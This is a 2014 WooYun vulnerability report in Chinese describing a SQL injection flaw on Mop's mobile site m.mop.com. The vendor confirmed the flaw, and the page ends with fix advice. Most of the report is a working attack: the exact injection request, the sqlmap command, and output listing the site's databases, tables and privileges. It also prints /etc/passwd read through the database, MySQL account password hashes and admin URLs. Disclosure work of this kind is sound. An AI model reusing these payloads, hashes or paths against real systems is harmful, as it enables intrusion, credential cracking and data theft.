当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079393

漏洞标题:猫扑某子站存在SQL注入漏洞

相关厂商:猫扑

漏洞作者: BMa

提交时间:2014-10-15 11:32

修复时间:2014-11-29 11:34

公开时间:2014-11-29 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-15: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-29: 细节向公众公开

简要描述:

猫扑某子站存在SQL注入漏洞,权限很大,影响多个数据库

详细说明:

payload:

POST /viewmessage_new.jsp?log=1&mypage=viewmessage_new.jsp&ufstr=141325665400905&uid=2042281654&uidt=2084414119&version=5 HTTP/1.1
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://m.mop.com:80/
Cookie: mop3gVer=5; _mopwap_UID_T=2084414119; _mopwap_UVSTR=141325665400905; JSESSIONID=aaalWnp4J2Ntkf5YsQmKu; Hm_lpvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; Hm_lvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; _mopwapuuid=b940d441-563a-407e-82d8-7a1396e7bf55; 
Host: m.mop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/


方法:

root@kali:~# sqlmap -r '/root/Desktop/2'  --data="curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] n
Are you sure you want to continue? [y/N] y


详细信息:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: email1
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND 8260=8260 AND 'CKtN'='CKtN
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND SLEEP(5) AND 'lire'='lire
---
[15:01:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[15:01:13] [INFO] fetching current database
[15:01:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:01:13] [INFO] retrieved: 
[15:01:15] [WARNING] reflective value(s) found and filtering out
mop
current database:    'mop'
[15:01:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times
[15:01:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/m.mop.com'
available databases [8]:
[*] app
[*] focus
[*] information_schema
[*] mop`
[*] mysql
[*] performance_schema
[*] test
[*] userlog
current user:    'wapuser@10.%'


Database: mop
[211 tables]
+-------------------------------------+
| Login_MP_Receive                    |
| UserBusiness_201101                 |
| UserBusiness_201102                 |
| UserBusiness_201103                 |
| UserBusiness_201104                 |
| UserBusiness_201105                 |
| UserBusiness_201106                 |
| UserBusiness_201107                 |
| UserBusiness_201108                 |
| UserBusiness_201109                 |
| UserBusiness_201110                 |
| UserBusiness_201111                 |
| UserBusiness_201112                 |
| UserBusiness_201201                 |
| UserBusiness_201202                 |
| UserBusiness_201203                 |
| UserBusiness_201204                 |
| UserBusiness_201205                 |
| UserBusiness_201206                 |
| UserBusiness_201207                 |
| UserBusiness_201208                 |
| UserBusiness_201209                 |
| UserBusiness_201210                 |
| UserBusiness_201211                 |
| UserBusiness_201212                 |
| UserBusiness_201301                 |
| UserBusiness_201302                 |
| UserBusiness_201303                 |
| UserBusiness_201304                 |
| UserBusiness_201305                 |
| UserBusiness_201306                 |
| UserBusiness_201307                 |
| UserBusiness_201308                 |
| UserBusiness_201309                 |
| UserBusiness_201310                 |
| UserBusiness_201311                 |
| UserBusiness_201312                 |
| UserBusiness_201401                 |
| UserBusiness_201402                 |
| UserBusiness_201403                 |
| UserBusiness_201404                 |
| UserBusiness_201405                 |
| UserBusiness_201406                 |
| UserBusiness_201407                 |
| UserBusiness_201408                 |
| UserBusiness_201409                 |
| UserBusiness_201410                 |
| UserOperate_201201                  |
| UserOperate_201202                  |
| UserOperate_201203                  |
| UserOperate_201204                  |
| UserOperate_201205                  |
| UserOperate_201206                  |
| UserOperate_201207                  |
| UserOperate_201208                  |
| UserOperate_201209                  |
| UserOperate_201210                  |
| UserOperate_201211                  |
| UserOperate_201212                  |
| UserOperate_201301                  |
| UserOperate_201302                  |
| UserOperate_201303                  |
| UserOperate_201304                  |
| UserOperate_201305                  |
| UserOperate_201306                  |
| UserOperate_201307                  |
| UserOperate_201308                  |
| UserOperate_201309                  |
| UserOperate_201310                  |
| UserOperate_201311                  |
| UserOperate_201312                  |
| UserOperate_201401                  |
| UserOperate_201402                  |
| UserOperate_201403                  |
| UserOperate_201404                  |
| UserOperate_201405                  |
| UserOperate_201406                  |
| UserOperate_201407                  |
| UserOperate_201408                  |
| UserOperate_201409                  |
| UserOperate_201410                  |
| 3g_edit_sublist2                    |
| 3g_edit_sublist                     |
| 3g_hotclick_info                    |
| 3g_hotclick_statistic               |
| 3g_huodong_view                     |
| 3g_huodong_views_syn_list           |
| 3g_huodong_views                    |
| 3g_investigate1_detail              |
| 3g_tjzq_list_hisbak                 |
| 3g_tjzq_list                        |
| 3g_topRegion                        |
| 3gpet_enter                         |
| 3gpet_mm_record                     |
| admin_Lefttree                      |
| admin_data_review                   |
| admin_operator_permission           |`
| article                             |
| article_info                        |
| audit_images                        |
| audit_images_20100720               |
| audit_images_process                |
| audit_images_source                 |
| baidu_keywords                      |
| business_detail                     |
| business_detail_20100720            |
| business_text                       |
| checkin                             |
| client_statistics                   |
| day_receive_login_mp                |
| day_receive_login_mpBK1105          |
| day_statistic_normal                |
| email_record                        |
| hi_send_log                         |
| hot_column                          |
| hozom_bind                          |
| huati_table                         |
| huati_table_tbak                    |
| huati_table_wcup                    |
| huodong_table_3g                    |
| image_monitor_log                   |
| ipdata                              |
| keywords_2009                       |
| login_times_patch                   |`
| mobile_area                         |
| mobile_bind                         |
| mobile_bind_tmp                     |
| mobile_up_message                   |
| monthData                           |
| mp_limit                            |
| mp_limit_dzh2                       |
| mp_tmp                              |
| mp_tmp2                             |
| mp_tmp_ok                           |
| passport_delete_user                |`
| passport_delete_user_1              |
| passport_delete_user_tmp            |
| postReplyStatistics                 |
| progress                            |
| purge_pic_upload3_postimg1          |
| quote_reply                         |
| quote_reply2                        |
| recent_subject                      |
| refere_login_temp                   |
| refere_reg_temp                     |
| refere_statistics                   |
| refere_statistics_temp              |
| referer_domain                      |
| reg_login_num                       |
| reg_login_num2                      |
| reg_login_num_week                  |
| register_return_dzh                 |
| register_return_dzh2                |
| register_return_dzh_week            |
| request_header_info                 |
| request_header_notwap               |
| send_feed                           |
| shualiang                           |
| shualiang_group                     |
| stat_page_href                      |
| statistic_back_login                |
| statistic_login_idlist              |
| statistic_reg_convert               |
| statistic_reg_idlist                |
| statistic_source                    |
| statistics                          |
| statistics_new                      |
| stockReward                         |
| subject_key                         |
| temp_focus                          |
| tmp_2                               |
| topic_subject                       |
| torch_application                   |
| torch_union                         |
| unionSubReward                      |
| unionSubRewardRec                   |
| union_login_total                   |
| url_counter                         |
| usermessage                         |`
| usermessage0                        |
| usermessage_info                    |
| uv_statistics                       |
| wap_auth_user                       |`
| wap_auth_user_path                  |
| wap_auth_user_temp                  |
| wap_auto_login                      |
| wap_auto_login20110907              |
| wap_auto_login_path                 |
| wap_hotclick_statistic              |
| wap_site_info                       |
| wap_site_linkOutStatistics          |
| wap_site_linkOutStatistics_baksLink |
| wap_site_statistics                 |
| wap_system_prop                     |`
| wap_time_statistic                  |
| wap_user_equip                      |
| wap_user_ext                        |
| wap_user_mobile                     |`
| wap_user_prop                       |
| wap_user_set                        |
| wap_user_telnum                     |
| wl_mobile_statistics                |
| wl_statirtics                       |
| wl_time_statistics                  |
| wl_time_statistics_backup20120221   |
| wl_time_statistics_bak120531        |
| wl_time_statistics_bak121026        |
| wl_uv_statistics                    |
| xn_connector                        |
| xn_reg                              |
| xn_reg_bak_091104                   |
+-------------------------------------+


Database: mop
Table: wap_auth_user
[12 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| time           | datetime     |
| block_order    | varchar(100) |
| block_show_num | varchar(100) |
| font_size      | int(11)      |
| login_key      | varchar(200) |
| login_times    | int(11)      |
| mp             | int(10)      |
| show_num       | int(11)      |
| show_pic       | int(11)      |
| user_id        | int(11)      |
| user_name      | varchar(100) |
| wc_show_num    | int(11)      |
+----------------+--------------+


数据库权限以及范围:

database management system users privileges:
[*] %% (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
    privilege: USAGE
[*] %beauty% [1]:
    privilege: REPLICATION SLAVE
[*] %root% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] %slave% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] %wapuser% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE


select load_file('/etc/passwd');:    'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\narpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nuuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nnscd:x:28:28:NSCD Daemon:/:/sbin/nologin\nmysql:x:497:498:MySQL server:/var/lib/mysql:/bin/bash\n'


后台:

后台:http://m.mop.com/admin/login.jsp
数据库帐号:<code>select user,password from mysql.user; [13]:
[*] beauty, 
[*] wapuser, 
[*] slave, 
[*] wapuser, 
[*] slave, 
[*] wapuser, 
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *9DFF44DFF4007B348C4AC352751C6AAE5B562A8C
[*] wapuser, *2726FA9A20F4078869AB791D5D12DF114D62CAFD


系统管理员入口:http://m.mop.com/test/server_rsh.jsp</code>
可以拿到shell,也可以拖库<这两个都没做,不深入>

漏洞证明:

1.png


2.png


3.png


4.png


5.png


6.png


7.png


8.png

修复方案:

平常也喜欢逛猫扑,要是有个礼物就好了
1,代码做好过滤
2,数据库权限设置
3,后台访问限制
4,系统帐号限制,不然可以读到某些文件

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-15 17:14

厂商回复:

谢谢,非常感谢!

最新状态:

暂无